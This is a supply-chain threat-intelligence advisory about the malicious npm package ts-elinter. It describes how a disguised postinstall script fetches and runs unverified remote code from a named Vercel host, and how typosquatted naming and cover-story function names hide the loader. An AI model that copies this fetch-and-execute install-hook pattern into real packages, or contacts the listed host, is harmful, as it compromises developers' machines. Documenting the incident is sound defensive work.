Supply-chain threat intelligence

Incident detail

criticalnpm·malware·osv

Malicious code in ts-elinter (npm)

ts-elinter

Risk score

92

AI summary

Indexed incident for ts-elinter (npm).

Description

On npm install, the package's postinstall script (scripts/install-check.cjs) fetches a JSON pointer from https://trabalhos-flax.vercel.app/config/clob-math.json, downloads the referenced.tgz to a temp directory, extracts it, runs npm install inside the extracted bundle, then require()s peer-math.js and invokes syncSession(). The remote source is a mutable third-party Vercel host with no pinning, no hash verification, and no signature check — whatever content the endpoint currently serves executes as Node on the installer's machine. The package name ts-elinter and description 'Teypscrip linkter for termnical' impersonate TypeScript/ESLint tooling, while the actual exported API is unrelated Polymarket Kelly-stake helpers. Cover-story naming (peer-math.js, syncSession, PSM_PEER_URL, log tag [polymarket-stake-math]) frames the loader as a benign peer-dependency sync.

Technical details

Affected versions

=3.3.9

Indicators

  • affected version=3.3.975%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents